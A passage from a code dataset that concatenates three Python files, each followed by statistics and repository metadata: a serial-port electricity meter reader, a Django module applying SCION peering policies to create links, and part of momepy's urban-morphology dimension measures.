    return data.decode("ascii")
def read(self) -> PowerMeterReading:
    """
    Try to read values from the power meter. Automatically opens the serial interface
    if not yet open. Closes it upon SerialException to force reopening on next attempt.
    :return: reading with values for the case of success, empty reading in case of failure
    """
    try:
        self.open()
        return self._parse_raw(self.read_raw())
    except SerialException:
        # Close so the next read() reopens the port from scratch.
        self.close()
        return PowerMeterReading(False, None, None, None)
def _parse_raw(self, raw: str) -> PowerMeterReading:
    """Extract the 1.8.1 (high) and 1.8.2 (low) registers from a raw readout."""
    high_kwh = None
    low_kwh = None
    for raw_line in raw.splitlines(keepends=False):
        stripped = raw_line.strip('\x02\x03\n\r \t')
        if stripped.startswith("1.8.1*"):
            high_kwh = self._parse_line_float(stripped)
        elif stripped.startswith("1.8.2*"):
            low_kwh = self._parse_line_float(stripped)
    total_kwh = None
    if high_kwh is not None and low_kwh is not None:
        total_kwh = high_kwh + low_kwh
    return PowerMeterReading(True, total_kwh, high_kwh, low_kwh)
def _parse_line_str(self, cleaned_line: str) -> Optional[str]:
begin = cleaned_line.find("(") + 1
end = cleaned_line.rfind(")")
if begin != -1 and end != -1:
return cleaned_line[begin:end]
else:
return None
def _parse_line_float(self, cleaned_line: str) -> Optional[float]:
try:
return float(self._parse_line_str(cleaned_line))
except ValueError:
return None
class SingleCounter:
    """Tracks one tariff register and derives average power between changes.

    The meter only exposes cumulative kWh registers, so power is estimated
    from the energy delta between two register changes divided by the time
    between them. The very first change only records an "edge"; the second
    change yields a power value. Whenever one tariff's register advances,
    the other tariff's power is forced to zero (both cannot run at once).
    """

    _prev_reading: Optional[float]   # last accepted register value (kWh)
    _prev_was_edge: bool             # True once a register change was seen
    power: Optional[float]           # latest derived average power (W)
    power_from_ts: Optional[float]   # start of the averaging interval
    power_to_ts: Optional[float]     # end of the averaging interval

    def __init__(self):
        self._prev_reading = None
        self._prev_was_edge = False
        self.power = None
        self.power_from_ts = None
        self.power_to_ts = None

    def update(self, reading_kwh: Optional[float], reading_ts: float, min_averaging_secs: float,
               other_counter: SingleCounter):
        """Feed one register reading; update power estimates on a change.

        :param reading_kwh: current register value, or None if unavailable
        :param reading_ts: timestamp of the reading (seconds)
        :param min_averaging_secs: minimum interval between accepted changes
        :param other_counter: counter of the complementary tariff
        """
        if reading_kwh is None or reading_kwh == self._prev_reading:
            return
        if self.power_to_ts is not None and (reading_ts - self.power_to_ts) < min_averaging_secs:
            return
        if self._prev_was_edge and self.power_to_ts is not None:
            # kWh -> W: 1 kWh == 3.6e6 Ws.
            elapsed = reading_ts - self.power_to_ts
            self.power = (reading_kwh - self._prev_reading) * 3.6e6 / elapsed
            self.power_from_ts = self.power_to_ts
            # The complementary tariff was inactive over the same interval.
            other_counter.power = 0
            other_counter.power_from_ts = self.power_from_ts
            other_counter._prev_was_edge = True
        if self._prev_reading is not None:
            self._prev_was_edge = True
        self._prev_reading = reading_kwh
        self.power_to_ts = reading_ts
class PowerMeterApatorEC3Repeating:
    """Periodically polls a :class:`PowerMeterApatorEC3` meter.

    Every ``interval`` seconds a reading is acquired; the high- and
    low-tariff registers are fed into their :class:`SingleCounter`
    instances to derive average power, and all registered callbacks are
    invoked with the latest reading.
    """

    min_averaging_secs: float
    _power_meter: PowerMeterApatorEC3
    _timer: RepeatTimer
    reading: Optional[PowerMeterReading]
    reading_ts: Optional[float]
    success: bool
    high: SingleCounter
    low: SingleCounter
    callbacks: List[Callable[[Optional[PowerMeterReading]], None]]

    def __init__(self, power_meter: PowerMeterApatorEC3, interval: float, min_averaging_secs: float):
        self._power_meter = power_meter
        self._timer = RepeatTimer(interval, self._acquire)
        self.min_averaging_secs = min_averaging_secs
        self.reading = None
        self.reading_ts = None
        self.success = False
        self.high = SingleCounter()
        self.low = SingleCounter()
        self.callbacks = []

    def add_callback(self, callback: Callable[[Optional[PowerMeterReading]], None]):
        """Register a callback invoked after every acquisition attempt."""
        self.callbacks.append(callback)

    def start(self):
        """Start the polling timer unless it is already running."""
        if not self._timer.is_alive():
            self._timer.start()

    def stop(self):
        """Cancel the polling timer and release the serial port."""
        self._timer.cancel()
        self._power_meter.close()

    def _acquire(self):
        """Timer callback: read the meter, update counters, notify listeners."""
        try:
            now = time.time()
            self.reading = self._power_meter.read()
            self.reading_ts = now
            self._update_high_power()
            self._update_low_power()
            self.success = True
        except SerialException:
            self.success = False
        self._fire()

    def _update_low_power(self):
        self.low.update(self.reading.consumption_low_sum_kwh, self.reading_ts,
                        self.min_averaging_secs, self.high)

    def _update_high_power(self):
        self.high.update(self.reading.consumption_high_sum_kwh, self.reading_ts,
                         self.min_averaging_secs, self.low)

    def _fire(self):
        for cb in self.callbacks:
            cb(self.reading)
if __name__ == '__main__':
    # Demo: poll the meter on COM5 every 30 s with a minimum 10 s power
    # averaging window and print each acquisition result.
    pm = PowerMeterApatorEC3Repeating(PowerMeterApatorEC3("COM5"), 30, 10)
    # Consistency fix: use the public add_callback() API instead of
    # mutating the callbacks list directly.
    pm.add_callback(lambda r: print(pm.success, r, pm.reading_ts, pm.low.power, pm.high.power))
    pm.start()
| 33.314286 | 115 | 0.636364 | 1,004 | 8,162 | 4.947211 | 0.231076 | 0.034226 | 0.014496 | 0.018321 | 0.151399 | 0.057177 | 0.031005 | 0.017314 | 0.017314 | 0.017314 | 0 | 0.011017 | 0.277138 | 8,162 | 244 | 116 | 33.45082 | 0.830847 | 0.165523 | 0 | 0.11875 | 0 | 0 | 0.042166 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1125 | false | 0 | 0.04375 | 0 | 0.35625 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b2ed7cd64ff69161aa71d32d7a5abf6638b0c2 | 6,939 | py | Python | django/peering_coord/peering_policy.py | netsys-lab/scion-peering-coordinator | cd2fc9e9423242cafe90e71a54f4ad9e763acdae | [
"MIT"
] | null | null | null | django/peering_coord/peering_policy.py | netsys-lab/scion-peering-coordinator | cd2fc9e9423242cafe90e71a54f4ad9e763acdae | [
"MIT"
] | null | null | null | django/peering_coord/peering_policy.py | netsys-lab/scion-peering-coordinator | cd2fc9e9423242cafe90e71a54f4ad9e763acdae | [
"MIT"
] | null | null | null | """Functions for updating links according to peering policies"""
from django.db import transaction
from django.db.models import Q, QuerySet
from peering_coord.api.client_connection import ClientRegistry
from peering_coord.api.peering_pb2 import AsyncError
from peering_coord.models.ixp import VLAN, Interface, Owner
from peering_coord.models.policies import (
AsPeerPolicy, DefaultPolicy, IsdPeerPolicy, OwnerPeerPolicy)
from peering_coord.models.scion import AS, AcceptedPeer, Link
@transaction.atomic
def update_accepted_peers(vlan: VLAN, asys: AS) -> None:
    """Update the AcceptedPeer relation of ASes accepted for peering.

    :param vlan: Peering VLAN to update.
    :param asys: AS whose accepted peers are updated.
    """
    current = AcceptedPeer.objects.filter(vlan=vlan, asys=asys).values_list('peer_id')
    desired = _get_accepted_peers(vlan, asys)

    # Diff the stored set against the freshly evaluated policies.
    to_remove = current.difference(desired)
    to_add = desired.difference(current)

    # Drop peers that are no longer accepted ...
    AcceptedPeer.objects.filter(vlan=vlan, asys=asys, peer_id__in=to_remove).delete()
    # ... and insert the newly accepted ones in a single bulk query.
    AcceptedPeer.objects.bulk_create(
        AcceptedPeer(vlan=vlan, asys=asys, peer_id=entry[0]) for entry in to_add)
def _get_accepted_peers(vlan: VLAN, asys: AS) -> QuerySet:
    """Get the set of ASes `asys` accepts for peering.

    Policies are combined so that more specific levels win: explicit AS-level
    rejections override owner-level accepts, and owner-level rejections
    override ISD-level accepts. A default-accept policy (if present) admits
    all other VLAN members not rejected at any level.

    :param vlan: Peering VLAN considered by the query.
    :param asys: AS whose potential peers are retrieved.
    :returns: A `QuerySet` of AS primary keys as returned by `values_list`.
    """
    # AS-level policies
    as_accept = AsPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=True).values_list('peer_as_id')
    as_reject = AsPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=False).values_list('peer_as_id')

    # Owner-level policies
    org_accept = Owner.objects.filter(
        id__in=OwnerPeerPolicy.objects.filter(
            vlan=vlan, asys=asys, accept=True).values_list('peer_owner_id'))
    org_reject = Owner.objects.filter(
        id__in=OwnerPeerPolicy.objects.filter(
            vlan=vlan, asys=asys, accept=False).values_list('peer_owner_id'))

    # ISD-level policies
    isd_accept = IsdPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=True).values_list('peer_isd_id')
    isd_reject = IsdPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=False).values_list('peer_isd_id')

    # Put it all together
    # Note: The same AS/Owner/ISD cannot be accepted *and* rejected at the same time.
    # Self-peering is excluded at every level via ~Q(id=asys.id).
    as_accepted_by_org = AS.objects.filter(
        Q(owner_id__in=org_accept) & ~Q(id=asys.id)).values_list('id')
    as_rejected_by_org = AS.objects.filter(
        Q(owner_id__in=org_reject) & ~Q(id=asys.id)).values_list('id')
    as_accepted_by_isd = AS.objects.filter(
        Q(isd_id__in=isd_accept) & ~Q(id=asys.id)).values_list('id')

    # Each term subtracts the rejections of all more specific levels before
    # being unioned in.
    accept = as_accept.union(
        as_accepted_by_org.difference(as_reject),
        as_accepted_by_isd.difference(as_rejected_by_org, as_reject)
    )

    # Handle default accept policy
    if DefaultPolicy.objects.filter(vlan=vlan, asys=asys, accept=True).exists():
        as_rejected_by_isd = AS.objects.filter(
            Q(isd_id__in=isd_reject) & ~Q(id=asys.id)).values_list('id')
        # All other ASes present in the VLAN, minus rejections at any level.
        as_all = vlan.members.values_list('asys', flat=True).filter(~Q(asys=asys.id)).distinct()
        accept = accept.union(as_all.difference(as_rejected_by_isd, as_rejected_by_org, as_reject))

    return accept
@transaction.atomic
def update_links(vlan: VLAN, asys: AS) -> None:
    """Create and delete links of the given AS to reflect the peering accepted by it and its peers.

    Uses accepted peerings from the AcceptedPeer relation instead of evaluating the peering
    policies directly. update_accepted_peers() must be called on every AS whose policies have
    changed for this function to get up-to-date data.

    :param vlan: Peering VLAN to update.
    :param asys: AS whose links are updated.
    """
    connected = asys.query_connected_peers(vlan=vlan)
    desired = asys.query_mutually_accepted_peers(vlan=vlan)

    stale = connected.difference(desired)
    missing = desired.difference(connected)

    # Delete links to peers that are no longer mutually accepted. Both
    # interfaces of a link are always in the same VLAN, so filtering on
    # interface_a's VLAN is sufficient.
    Link.objects.filter(
        Q(interface_a__vlan=vlan)
        & (Q(interface_a__peering_client__asys=asys, interface_b__peering_client__asys__in=stale)
           | Q(interface_a__peering_client__asys__in=stale, interface_b__peering_client__asys=asys))
    ).delete()

    # Create links to newly accepted peers.
    for entry in missing:
        _create_links(vlan, asys, AS.objects.get(id=entry[0]))
def _create_links(vlan: VLAN, as_a: AS, as_b: AS):
    """Create links between all interfaces of `as_a` and `as_b` in `vlan`.

    The link type is determined from the AS types. On failure (incompatible
    AS types or exhausted port ranges) an AsyncError is pushed to the
    affected clients instead of raising.
    """
    # Figure out which link type to use.
    if as_a.is_core and as_b.is_core:
        link_type = Link.Type.CORE
    elif not as_a.is_core and not as_b.is_core:
        link_type = Link.Type.PEERING
    elif as_a.isd == as_b.isd:
        # Exactly one AS is core here; a core/non-core pair within the same
        # ISD forms a provider-customer link.
        link_type = Link.Type.PROVIDER
        if not as_a.is_core and as_b.is_core:
            # Normalize so that as_a is the core (provider) side.
            as_a, as_b = as_b, as_a
    else:
        # Core to non-core across different ISDs: no valid link type.
        # Notify both parties and bail out.
        error = AsyncError()
        error.code = AsyncError.Code.LINK_CREATION_FAILED
        error.message = "Cannot create a link between ASes {} and {} of incompatible type.".format(
            as_a, as_b
        )
        ClientRegistry.send_async_error(as_a.asn, error)
        ClientRegistry.send_async_error(as_b.asn, error)
        return

    # Create one link per interface pair, allocating a port on each side.
    for interface_a in as_a.query_interfaces().filter(vlan=vlan).all():
        for interface_b in as_b.query_interfaces().filter(vlan=vlan).all():
            port_a = port_b = None
            try:
                port_a = interface_a.get_unused_port()
            except Interface.NoUnusedPorts:
                error = AsyncError()
                error.code = AsyncError.Code.LINK_CREATION_FAILED
                error.message = "Allocated port range is exhausted on interface {}.".format(
                    interface_a)
                ClientRegistry.send_async_error(as_a.asn, error)
            try:
                port_b = interface_b.get_unused_port()
            except Interface.NoUnusedPorts:
                error = AsyncError()
                error.code = AsyncError.Code.LINK_CREATION_FAILED
                error.message = "Allocated port range is exhausted on interface {}.".format(
                    interface_b)
                ClientRegistry.send_async_error(as_b.asn, error)
            # NOTE(review): truthiness check — if 0 were ever a valid port
            # number, this would silently skip link creation; confirm
            # get_unused_port() never returns 0.
            if port_a and port_b:
                Link.objects.create(link_type,
                                    interface_a=interface_a, interface_b=interface_b,
                                    port_a=port_a, port_b=port_b)
| 40.817647 | 99 | 0.683816 | 978 | 6,939 | 4.616564 | 0.175869 | 0.033666 | 0.034552 | 0.035437 | 0.442082 | 0.407309 | 0.339092 | 0.32093 | 0.245183 | 0.223034 | 0 | 0.000555 | 0.221646 | 6,939 | 169 | 100 | 41.059172 | 0.835401 | 0.213143 | 0 | 0.194175 | 0 | 0 | 0.047059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.067961 | 0 | 0.126214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b55411280b2c91c5d8253412bafa1ca94c9a7f | 33,900 | py | Python | momepy/dimension.py | AleFeli/momepy | fd68bdd2518e2c1cadce41a6059a93cebb2c1864 | [
"MIT"
] | 1 | 2021-06-19T05:41:30.000Z | 2021-06-19T05:41:30.000Z | momepy/dimension.py | AleFeli/momepy | fd68bdd2518e2c1cadce41a6059a93cebb2c1864 | [
"MIT"
] | null | null | null | momepy/dimension.py | AleFeli/momepy | fd68bdd2518e2c1cadce41a6059a93cebb2c1864 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# dimension.py
# definitions of dimension characters
import math
import numpy as np
import pandas as pd
import scipy as sp
from shapely.geometry import LineString, Point, Polygon
from tqdm import tqdm
from .shape import _make_circle
__all__ = [
"Area",
"Perimeter",
"Volume",
"FloorArea",
"CourtyardArea",
"LongestAxisLength",
"AverageCharacter",
"StreetProfile",
"WeightedCharacter",
"CoveredArea",
"PerimeterWall",
"SegmentsLength",
]
class Area:
    """Measure the area of every object in a GeoDataFrame.

    Thin wrapper around GeoPandas ``.area`` kept for API consistency within
    momepy. Works with any polygonal element (building footprint, plot,
    tessellation cell, block).

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame

    Examples
    --------
    >>> buildings['area'] = momepy.Area(buildings).series
    >>> buildings.area[0]
    728.5574947044363
    """

    def __init__(self, gdf):
        self.gdf = gdf
        self.series = gdf.geometry.area
class Perimeter:
    """Measure the perimeter of every object in a GeoDataFrame.

    Thin wrapper around GeoPandas ``.length`` kept for API consistency
    within momepy. Works with any polygonal element (building footprint,
    plot, tessellation cell, block).

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame

    Examples
    --------
    >>> buildings['perimeter'] = momepy.Perimeter(buildings).series
    >>> buildings.perimeter[0]
    137.18630991119903
    """

    def __init__(self, gdf):
        self.gdf = gdf
        self.series = gdf.geometry.length
class Volume:
    """Measure the volume of each object as ``area * height``.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    heights : str, list, np.array, pd.Series
        column name, ``np.array``, or ``pd.Series`` holding the height values
    areas : str, list, np.array, pd.Series (default None)
        column name, ``np.array``, or ``pd.Series`` holding the area values.
        If None, areas are computed from the geometry on the fly.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    heights : Series
        Series containing used heights values
    areas : GeoDataFrame
        Series containing used areas values

    Examples
    --------
    >>> buildings['volume'] = momepy.Volume(buildings, heights='height_col').series
    >>> buildings.volume[0]
    7285.5749470443625
    """

    def __init__(self, gdf, heights, areas=None):
        self.gdf = gdf
        data = gdf.copy()

        # Accept either a column name or an array-like of values.
        if not isinstance(heights, str):
            data["mm_h"] = heights
            heights = "mm_h"
        self.heights = data[heights]

        if areas is None:
            self.areas = data.geometry.area
        else:
            if not isinstance(areas, str):
                data["mm_a"] = areas
                areas = "mm_a"
            self.areas = data[areas]

        try:
            self.series = self.areas * self.heights
        except KeyError:
            raise KeyError(
                "ERROR: Column not found. Define heights and areas or set areas to None."
            )
class FloorArea:
    """Measure the total floor area of each object from height and area.

    The number of floors is approximated as ``height // 3`` (one floor is
    assumed to be roughly 3 metres), so the result is
    ``area * (height // 3)``.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    heights : str, list, np.array, pd.Series
        column name, ``np.array``, or ``pd.Series`` holding the height values
    areas : str, list, np.array, pd.Series (default None)
        column name, ``np.array``, or ``pd.Series`` holding the area values.
        If None, areas are computed from the geometry on the fly.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    heights : Series
        Series containing used heights values
    areas : GeoDataFrame
        Series containing used areas values

    Examples
    --------
    >>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col').series
    >>> buildings.floor_area[0]
    2185.672484113309
    """

    def __init__(self, gdf, heights, areas=None):
        self.gdf = gdf
        data = gdf.copy()

        # Accept either a column name or an array-like of values.
        if not isinstance(heights, str):
            data["mm_h"] = heights
            heights = "mm_h"
        self.heights = data[heights]

        if areas is None:
            self.areas = data.geometry.area
        else:
            if not isinstance(areas, str):
                data["mm_a"] = areas
                areas = "mm_a"
            self.areas = data[areas]

        try:
            self.series = self.areas * (self.heights // 3)
        except KeyError:
            raise KeyError(
                "ERROR: Column not found. Define heights and areas or set areas to None."
            )
class CourtyardArea:
    """Measure the area of interior rings (courtyards) of each polygon.

    The courtyard area equals the area enclosed by the exterior ring minus
    the polygon's own area. Geometry must be ``shapely.geometry.Polygon``.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    areas : str, list, np.array, pd.Series (default None)
        column name, ``np.array``, or ``pd.Series`` holding the area values.
        If None, areas are computed from the geometry on the fly.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    areas : GeoDataFrame
        Series containing used areas values

    Examples
    --------
    >>> buildings['courtyard_area'] = momepy.CourtyardArea(buildings).series
    >>> buildings.courtyard_area[80]
    353.33274206543274
    """

    def __init__(self, gdf, areas=None):
        self.gdf = gdf
        data = gdf.copy()

        if areas is None:
            areas = data.geometry.area
        if not isinstance(areas, str):
            data["mm_a"] = areas
            areas = "mm_a"
        self.areas = data[areas]

        # Polygons rebuilt from exterior rings only; their area minus the
        # original area is the area of all holes.
        exteriors = data.geometry.apply(lambda geom: Polygon(geom.exterior))
        self.series = pd.Series(exteriors.area - data[areas], index=data.index)
def _longest_axis(points):
    """Diameter of the minimal circumscribed circle around ``points``.

    ``_make_circle`` returns ``(x, y, r)``; the longest axis is ``2 * r``.
    """
    return 2 * _make_circle(points)[2]
class LongestAxisLength:
    """Measure the length of the longest axis of each object.

    The axis is the diameter of the minimal circumscribed circle around the
    convex hull; it does not have to lie fully inside the object.

    .. math::
        \\max \\left\\{d_{1}, d_{2}, \\ldots, d_{n}\\right\\}

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame

    Examples
    --------
    >>> buildings['lal'] = momepy.LongestAxisLength(buildings).series
    >>> buildings.lal[0]
    40.2655616057102
    """

    def __init__(self, gdf):
        self.gdf = gdf
        convex_hulls = gdf.geometry.convex_hull
        self.series = convex_hulls.apply(
            lambda hull: _longest_axis(hull.exterior.coords)
        )
class AverageCharacter:
    """
    Calculates the average of a character within a set neighbourhood defined in ``spatial_weights``

    Average value of the character within a set neighbourhood defined in ``spatial_weights``.
    Can be set to ``mean``, ``median`` or ``mode``. ``mean`` is defined as:

    .. math::
        \\frac{1}{n}\\left(\\sum_{i=1}^{n} value_{i}\\right)

    Adapted from :cite:`hausleitner2017`.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing morphological tessellation
    values : str, list, np.array, pd.Series
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored character value.
    unique_id : str
        name of the column with unique id used as ``spatial_weights`` index.
    spatial_weights : libpysal.weights
        spatial weights matrix
    rng : Two-element sequence containing floats in range of [0,100], optional
        Percentiles over which to compute the range. Each must be
        between 0 and 100, inclusive. The order of the elements is not important.
    mode : str (default 'all')
        mode of average calculation. Can be set to `all`, `mean`, `median` or `mode` or
        list of any of the options.

    Attributes
    ----------
    series : Series
        Series containing resulting mean values
    mean : Series
        Series containing resulting mean values
    median : Series
        Series containing resulting median values
    mode : Series
        Series containing resulting mode values
    gdf : GeoDataFrame
        original GeoDataFrame
    values : GeoDataFrame
        Series containing used values
    sw : libpysal.weights
        spatial weights matrix
    id : Series
        Series containing used unique ID
    rng : tuple
        range
    modes : str
        mode

    Examples
    --------
    >>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation, threshold=100, silence_warnings=True, ids='uID')
    >>> tessellation['mean_area'] = momepy.AverageCharacter(tessellation, values='area', spatial_weights=sw, unique_id='uID').mean
    100%|██████████| 144/144 [00:00<00:00, 1433.32it/s]
    >>> tessellation.mean_area[0]
    4823.1334436678835
    """

    def __init__(self, gdf, values, spatial_weights, unique_id, rng=None, mode="all"):
        self.gdf = gdf
        self.sw = spatial_weights
        self.id = gdf[unique_id]
        self.rng = rng
        self.modes = mode

        if rng:
            # Deferred import — presumably avoids a circular import at
            # module load time (momepy re-exports this module); confirm.
            from momepy import limit_range

        data = gdf.copy()
        if values is not None:
            # Accept either a column name or an array-like of values.
            if not isinstance(values, str):
                data["mm_v"] = values
                values = "mm_v"
            self.values = data[values]

        # Re-index by the unique id so neighbour lookups from the weights
        # matrix can be resolved with .loc.
        data = data.set_index(unique_id)[values]

        means = []
        medians = []
        modes = []

        # Normalize `mode` into a list of the requested statistics.
        # NOTE(review): a value of unsupported type (e.g. int) passes
        # through unvalidated and fails later at the `in` checks — confirm
        # whether stricter validation is wanted.
        allowed = ["mean", "median", "mode"]
        if mode == "all":
            mode = allowed
        elif isinstance(mode, list):
            for m in mode:
                if m not in allowed:
                    raise ValueError("{} is not supported as mode.".format(mode))
        elif isinstance(mode, str):
            if mode not in allowed:
                raise ValueError("{} is not supported as mode.".format(mode))
            mode = [mode]

        for index in tqdm(data.index, total=data.shape[0]):
            if index in spatial_weights.neighbors.keys():
                # The element itself is included in its own neighbourhood.
                neighbours = spatial_weights.neighbors[index].copy()
                if neighbours:
                    neighbours.append(index)
                else:
                    neighbours = [index]
                values_list = data.loc[neighbours]

                if rng:
                    # Clip values to the requested percentile range.
                    values_list = limit_range(values_list, rng=rng)
                if "mean" in mode:
                    means.append(np.mean(values_list))
                if "median" in mode:
                    medians.append(np.median(values_list))
                if "mode" in mode:
                    modes.append(sp.stats.mode(values_list)[0][0])
            else:
                # id missing from the weights matrix: no neighbourhood known.
                if "mean" in mode:
                    means.append(np.nan)
                if "median" in mode:
                    medians.append(np.nan)
                if "mode" in mode:
                    modes.append(np.nan)

        if "mean" in mode:
            # `series` aliases `mean` for backwards compatibility.
            self.series = self.mean = pd.Series(means, index=gdf.index)
        if "median" in mode:
            self.median = pd.Series(medians, index=gdf.index)
        if "mode" in mode:
            self.mode = pd.Series(modes, index=gdf.index)
class StreetProfile:
    """
    Calculates the street profile characters.

    Returns a dictionary with widths, standard deviation of width, openness, heights,
    standard deviation of height and ratio height/width. Algorithm generates perpendicular
    lines (ticks) to ``left`` dataframe features every ``distance`` and measures values on
    intersection with features of ``right``. If no feature is reached within
    ``tick_length`` its value is set as width (being a theoretical maximum).

    Derived from :cite:`araldi2019`.

    Parameters
    ----------
    left : GeoDataFrame
        GeoDataFrame containing streets to analyse
    right : GeoDataFrame
        GeoDataFrame containing buildings along the streets (only Polygon geometry type is supported)
    heights: str, list, np.array, pd.Series (default None)
        the name of the buildings dataframe column, ``np.array``, or ``pd.Series`` where is stored building height. If set to None,
        height and ratio height/width will not be calculated.
    distance : int (default 10)
        distance between perpendicular ticks
    tick_length : int (default 50)
        length of ticks

    Attributes
    ----------
    w : Series
        Series containing street profile width values
    wd : Series
        Series containing street profile standard deviation values
    o : Series
        Series containing street profile openness values
    h : Series
        Series containing street profile heights values. Returned only when heights is set.
    hd : Series
        Series containing street profile heights standard deviation values. Returned only when heights is set.
    p : Series
        Series containing street profile height/width ratio values. Returned only when heights is set.
    left : GeoDataFrame
        original left GeoDataFrame
    right : GeoDataFrame
        original right GeoDataFrame
    distance : int
        distance between perpendicular ticks
    tick_length : int
        length of ticks
    heights : GeoDataFrame
        Series containing used height values

    Examples
    --------
    >>> street_profile = momepy.StreetProfile(streets_df, buildings_df, heights='height')
    100%|██████████| 33/33 [00:02<00:00, 15.66it/s]
    >>> streets_df['width'] = street_profile.w
    >>> streets_df['deviations'] = street_profile.wd
    """

    def __init__(self, left, right, heights=None, distance=10, tick_length=50):
        self.left = left
        self.right = right
        self.distance = distance
        self.tick_length = tick_length

        if heights is not None:
            # Accept either a column name or an array-like of values.
            if not isinstance(heights, str):
                right = right.copy()
                right["mm_h"] = heights
                heights = "mm_h"
            self.heights = right[heights]

        # Spatial index over the buildings for fast tick intersection tests.
        sindex = right.sindex

        results_list = []
        deviations_list = []
        heights_list = []
        heights_deviations_list = []
        openness_list = []

        for idx, row in tqdm(left.iterrows(), total=left.shape[0]):
            # list to hold all the point coords
            list_points = []
            # set the current distance to place the point
            current_dist = distance
            # make shapely MultiLineString object
            shapely_line = row.geometry
            # get the total length of the line
            line_length = shapely_line.length
            # append the starting coordinate to the list
            list_points.append(Point(list(shapely_line.coords)[0]))
            # https://nathanw.net/2012/08/05/generating-chainage-distance-nodes-in-qgis/
            # while the current cumulative distance is less than the total length of the line
            while current_dist < line_length:
                # use interpolate and increase the current distance
                list_points.append(shapely_line.interpolate(current_dist))
                current_dist += distance
            # append end coordinate to the list
            list_points.append(Point(list(shapely_line.coords)[-1]))

            # Build a pair of opposite perpendicular half-ticks at each
            # chainage point; both ticks end at the street point itself.
            ticks = []
            for num, pt in enumerate(list_points, 1):
                # start chainage 0
                if num == 1:
                    angle = self._getAngle(pt, list_points[num])
                    line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
                    angle = self._getAngle(line_end_1, pt)
                    line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
                    tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
                    tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
                    ticks.append([tick1, tick2])

                # everything in between
                if num < len(list_points) - 1:
                    angle = self._getAngle(pt, list_points[num])
                    line_end_1 = self._getPoint1(
                        list_points[num], angle, tick_length / 2
                    )
                    angle = self._getAngle(line_end_1, list_points[num])
                    line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
                    tick1 = LineString(
                        [
                            (line_end_1.x, line_end_1.y),
                            (list_points[num].x, list_points[num].y),
                        ]
                    )
                    tick2 = LineString(
                        [
                            (line_end_2.x, line_end_2.y),
                            (list_points[num].x, list_points[num].y),
                        ]
                    )
                    ticks.append([tick1, tick2])

                # end chainage
                if num == len(list_points):
                    angle = self._getAngle(list_points[num - 2], pt)
                    line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
                    angle = self._getAngle(line_end_1, pt)
                    line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
                    tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
                    tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
                    ticks.append([tick1, tick2])

            # widths = []
            m_heights = []
            lefts = []
            rights = []
            for duo in ticks:
                for ix, tick in enumerate(duo):
                    # Candidate buildings via bounding-box query, then exact
                    # intersection of their exterior rings with the tick.
                    possible_intersections_index = list(
                        sindex.intersection(tick.bounds)
                    )
                    possible_intersections = right.iloc[possible_intersections_index]
                    real_intersections = possible_intersections.intersects(tick)
                    get_height = right.loc[list(real_intersections.index)]
                    possible_int = get_height.exterior.intersection(tick)

                    if not possible_int.is_empty.all():
                        # Flatten Point/MultiPoint results into a point list.
                        true_int = []
                        for one in list(possible_int.index):
                            if possible_int[one].type == "Point":
                                true_int.append(possible_int[one])
                            elif possible_int[one].type == "MultiPoint":
                                for p in possible_int[one]:
                                    true_int.append(p)

                        if len(true_int) > 1:
                            # Multiple crossings: keep the one closest to the
                            # street-side end of the tick.
                            distances = []
                            ix = 0
                            for p in true_int:
                                dist = p.distance(Point(tick.coords[-1]))
                                distances.append(dist)
                                ix = ix + 1
                            minimal = min(distances)
                            # NOTE(review): `ix` was just reassigned by the
                            # loop above and ends up == len(true_int) (never
                            # 0), so this always appends to `rights`; it
                            # shadows the left/right tick index from
                            # enumerate(duo) — confirm whether intended.
                            if ix == 0:
                                lefts.append(minimal)
                            else:
